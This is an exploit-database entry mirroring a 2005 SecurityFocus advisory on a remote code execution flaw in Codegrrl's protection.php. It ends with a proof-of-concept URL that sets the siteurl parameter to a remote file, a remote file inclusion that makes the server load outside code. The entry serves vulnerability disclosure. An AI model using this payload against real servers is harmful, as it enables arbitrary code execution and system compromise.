Codegrrl - Protection.php Code Execution

2005-11-14T00:00:00
ID EXPLOITPACK:346F407B96C1ABD563A27E620FEC98A4
Type exploitpack
Reporter Robin Verton
Modified 2005-11-14T00:00:00

Description

Codegrrl - Protection.php Code Execution

                                        
                                            source: https://www.securityfocus.com/bid/15417/info

Unspecified Codegrrl applications are prone to a remote arbitrary code execution vulnerability. This is due to a lack of proper sanitization of user-supplied input.

An attacker can exploit this to execute arbitrary code in the context of the Web server process. This may facilitate a compromise of the system; other attacks are also possible. 

http://www.example.com/protection.php?action=logout&siteurl=http://www.example.com/malicoius-code.txt